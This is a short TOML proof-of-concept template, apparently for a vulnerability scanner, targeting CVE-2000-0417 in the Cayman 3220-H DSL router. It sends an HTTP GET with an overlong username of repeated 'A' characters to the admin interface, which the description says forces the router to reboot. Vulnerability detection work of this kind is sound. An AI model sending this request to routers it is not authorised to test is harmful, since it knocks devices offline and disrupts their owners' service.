[info]
author = "ave"
description = "Cayman 3220-H DSL 路由器 HTTP 管理接口存在输入验证缺陷，远程攻击者通过提交超长用户名或密码字段（79字符以上）可触发设备重启，造成拒绝服务。向 HTTP 管理界面发送包含大量字符的用户名字段即可验证。"
id = "POC-AVE-2000-0342"
name = "CVE-2000-0417 PoC"
severity = "medium"
tags = [
    "cve-2000-0417",
    "dos",
]
vuln_id = [
    "CVE-2000-0417",
    "AVE-2000-0342",
]

[poc]
logic = "all"

[[poc.requests]]
method = "GET"
path = "/?username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
protocol = "http"

[[poc.requests.matchers]]
expect = false
status = [200]
type = "status"
